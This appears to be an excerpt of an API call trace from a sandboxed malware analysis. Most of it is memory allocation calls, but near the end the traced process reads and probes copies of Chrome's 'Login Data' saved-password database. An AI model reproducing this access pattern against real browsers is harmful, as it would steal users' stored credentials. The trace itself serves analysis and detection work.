	[0219.038] VirtualQuery (in: lpAddress=0x1dd0000, lpBuffer=0x1b5d654, dwLength=0x1c | out: lpBuffer=0x1b5d654*(BaseAddress=0x1dd0000, AllocationBase=0x1dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.039] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.039] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.039] VirtualAlloc (lpAddress=0x0, dwSize=0x3f, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.039] VirtualQuery (in: lpAddress=0x1df0000, lpBuffer=0x1b5d658, dwLength=0x1c | out: lpBuffer=0x1b5d658*(BaseAddress=0x1df0000, AllocationBase=0x1df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.039] VirtualQuery (in: lpAddress=0x1df0000, lpBuffer=0x1b5d654, dwLength=0x1c | out: lpBuffer=0x1b5d654*(BaseAddress=0x1df0000, AllocationBase=0x1df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.039] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.039] VirtualFree (lpAddress=0x1df0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.040] VirtualAlloc (lpAddress=0x0, dwSize=0x41, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.040] VirtualAlloc (lpAddress=0x0, dwSize=0x3d, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000
	[0219.040] VirtualQuery (in: lpAddress=0x1f00000, lpBuffer=0x1b5d658, dwLength=0x1c | out: lpBuffer=0x1b5d658*(BaseAddress=0x1f00000, AllocationBase=0x1f00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.040] VirtualQuery (in: lpAddress=0x1f00000, lpBuffer=0x1b5d654, dwLength=0x1c | out: lpBuffer=0x1b5d654*(BaseAddress=0x1f00000, AllocationBase=0x1f00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.040] VirtualAlloc (lpAddress=0x0, dwSize=0xc8, flAllocationType=0x3000, flProtect=0x4) returned 0x1f20000
	[0219.041] VirtualFree (lpAddress=0x1f00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.041] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.041] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000
	[0219.041] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1f40000
	[0219.042] VirtualFree (lpAddress=0x1dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.042] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.042] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.042] VirtualFree (lpAddress=0x1df0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.042] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.043] VirtualFree (lpAddress=0x1f20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.043] VirtualFree (lpAddress=0x1f00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.043] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.043] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.043] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.044] VirtualQuery (in: lpAddress=0x1de0000, lpBuffer=0x1b5d64c, dwLength=0x1c | out: lpBuffer=0x1b5d64c*(BaseAddress=0x1de0000, AllocationBase=0x1de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.044] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.044] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.045] VirtualAlloc (lpAddress=0x0, dwSize=0x3d, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.045] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.045] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.045] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.045] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000
	[0219.046] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x1f20000
	[0219.046] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.046] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.046] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.047] VirtualFree (lpAddress=0x1f00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.047] VirtualFree (lpAddress=0x1df0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.047] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.047] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.047] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.048] VirtualQuery (in: lpAddress=0x1de0000, lpBuffer=0x1b5d64c, dwLength=0x1c | out: lpBuffer=0x1b5d64c*(BaseAddress=0x1de0000, AllocationBase=0x1de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.048] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.048] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.048] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.048] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.049] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.049] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.049] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000
	[0219.049] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1f60000
	[0219.050] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1f70000
	[0219.050] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x1f80000
	[0219.050] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.050] VirtualAlloc (lpAddress=0x0, dwSize=0x3f, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.051] VirtualQuery (in: lpAddress=0x1f90000, lpBuffer=0x1b5d658, dwLength=0x1c | out: lpBuffer=0x1b5d658*(BaseAddress=0x1f90000, AllocationBase=0x1f90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.051] VirtualQuery (in: lpAddress=0x1f90000, lpBuffer=0x1b5d654, dwLength=0x1c | out: lpBuffer=0x1b5d654*(BaseAddress=0x1f90000, AllocationBase=0x1f90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.051] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.051] VirtualFree (lpAddress=0x1f90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.051] VirtualAlloc (lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.051] VirtualAlloc (lpAddress=0x0, dwSize=0x81, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.052] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1fd0000
	[0219.052] VirtualFree (lpAddress=0x1f80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.052] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.052] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.053] VirtualFree (lpAddress=0x1f90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.053] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1f80000
	[0219.053] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.053] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.053] VirtualQuery (in: lpAddress=0x1fa0000, lpBuffer=0x1b5d64c, dwLength=0x1c | out: lpBuffer=0x1b5d64c*(BaseAddress=0x1fa0000, AllocationBase=0x1fa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.054] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.054] VirtualFree (lpAddress=0x1f90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.054] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.055] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.055] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.055] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.055] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.055] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000
	[0219.056] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2010000
	[0219.056] VirtualFree (lpAddress=0x1f90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.056] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.057] VirtualFree (lpAddress=0x1fe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.057] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.057] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.057] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.057] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.058] VirtualQuery (in: lpAddress=0x1fa0000, lpBuffer=0x1b5d64c, dwLength=0x1c | out: lpBuffer=0x1b5d64c*(BaseAddress=0x1fa0000, AllocationBase=0x1fa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.058] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.058] VirtualFree (lpAddress=0x1f90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.058] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5dcf0 | out: lpOverlapped=0x1b5dcf0) returned 1
	[0219.058] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.059] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.059] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.059] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.060] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.060] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2020000
	[0219.060] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x2030000
	[0219.060] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2040000
	[0219.061] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.061] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.061] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000
	[0219.061] VirtualQuery (in: lpAddress=0x2070000, lpBuffer=0x1b5d6ac, dwLength=0x1c | out: lpBuffer=0x1b5d6ac*(BaseAddress=0x2070000, AllocationBase=0x2070000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.062] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.062] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.062] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e9b0 | out: lpOverlapped=0x1b5e9b0) returned 1
	[0219.062] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5e99c | out: lpOverlapped=0x1b5e99c) returned 1
	[0219.062] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e9b4 | out: lpOverlapped=0x1b5e9b4) returned 1
	[0219.062] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0244, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91
	[0219.062] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.063] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0244, cbMultiByte=-1, lpWideCharStr=0x2060000, cchWideChar=91 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-journal") returned 91
	[0219.063] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e9a8 | out: lpFileInformation=0x1b5e9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.063] GetLastError () returned 0x2
	[0219.063] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.063] ReadFile (in: hFile=0x114, lpBuffer=0x1b5ea2c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x1b5ea1c, lpOverlapped=0x1b5e9e0 | out: lpBuffer=0x1b5ea2c*, lpNumberOfBytesRead=0x1b5ea1c*=0x10, lpOverlapped=0x1b5e9e0) returned 1
	[0219.063] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029f, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87
	[0219.063] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.063] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029f, cbMultiByte=-1, lpWideCharStr=0x2060000, cchWideChar=87 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-wal") returned 87
	[0219.063] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e9d8 | out: lpFileInformation=0x1b5e9d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.063] GetLastError () returned 0x2
	[0219.063] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.064] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5e9f4 | out: lpFileSizeHigh=0x1b5e9f4*=0x0) returned 0x4800
	[0219.064] ReadFile (in: hFile=0x114, lpBuffer=0x1749b40, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e9e8, lpOverlapped=0x1b5e9ac | out: lpBuffer=0x1749b40*, lpNumberOfBytesRead=0x1b5e9e8*=0x800, lpOverlapped=0x1b5e9ac) returned 1
	[0219.064] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e980 | out: lpOverlapped=0x1b5e980) returned 1
	[0219.064] CloseHandle (hObject=0x114) returned 1
	[0219.064] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5ec68, dwLength=0x1c | out: lpBuffer=0x1b5ec68*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.064] VirtualFree (lpAddress=0x1620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.065] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.065] VirtualFree (lpAddress=0x1640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.065] VirtualFree (lpAddress=0x1630000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.065] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.066] VirtualFree (lpAddress=0x2010000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.066] VirtualFree (lpAddress=0x1fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.066] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.066] VirtualFree (lpAddress=0x1f40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.066] VirtualFree (lpAddress=0x1ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.067] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.067] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.067] VirtualFree (lpAddress=0x1df0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.067] VirtualFree (lpAddress=0x1f10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.067] VirtualFree (lpAddress=0x1f60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.068] VirtualFree (lpAddress=0x1f70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.068] VirtualFree (lpAddress=0x1f00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.068] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.068] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.068] VirtualFree (lpAddress=0x1f20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.069] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.069] VirtualFree (lpAddress=0x1b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.069] VirtualFree (lpAddress=0x1b60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.069] VirtualFree (lpAddress=0x1b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.069] VirtualFree (lpAddress=0x1b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.069] VirtualFree (lpAddress=0x1b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.070] VirtualFree (lpAddress=0x1ba0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.070] VirtualFree (lpAddress=0x1bb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.070] VirtualFree (lpAddress=0x1bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.070] VirtualFree (lpAddress=0x1bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.070] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.071] VirtualFree (lpAddress=0x1bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.071] VirtualFree (lpAddress=0x1c00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.071] VirtualFree (lpAddress=0x1c10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.071] VirtualFree (lpAddress=0x1c20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.071] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.072] VirtualFree (lpAddress=0x1d50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.072] VirtualFree (lpAddress=0x1d60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.072] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.072] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.072] VirtualFree (lpAddress=0x1d90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.072] VirtualFree (lpAddress=0x1da0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.073] VirtualFree (lpAddress=0x1db0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.073] VirtualFree (lpAddress=0x1d70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.073] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.073] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.073] VirtualFree (lpAddress=0x1ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.073] VirtualFree (lpAddress=0x1a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.074] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.074] VirtualFree (lpAddress=0x1a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.074] VirtualFree (lpAddress=0x1750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.074] VirtualFree (lpAddress=0x1760000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.074] VirtualFree (lpAddress=0x1690000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.074] VirtualFree (lpAddress=0x16f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.075] VirtualFree (lpAddress=0x1700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.075] VirtualFree (lpAddress=0x1710000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.075] VirtualFree (lpAddress=0x1720000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.075] VirtualFree (lpAddress=0x16a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.075] VirtualFree (lpAddress=0x5a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.075] VirtualFree (lpAddress=0x1680000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x1f80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x1dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x1730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.076] VirtualFree (lpAddress=0x5b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x2020000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x2030000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x1fe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.077] VirtualFree (lpAddress=0x1f90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.078] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.078] VirtualFree (lpAddress=0x2050000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.078] VirtualFree (lpAddress=0x1610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.078] VirtualFree (lpAddress=0x1650000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.078] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.078] VirtualFree (lpAddress=0x520000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.079] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.079] VirtualFree (lpAddress=0x550000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.079] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.079] VirtualFree (lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.079] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.079] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
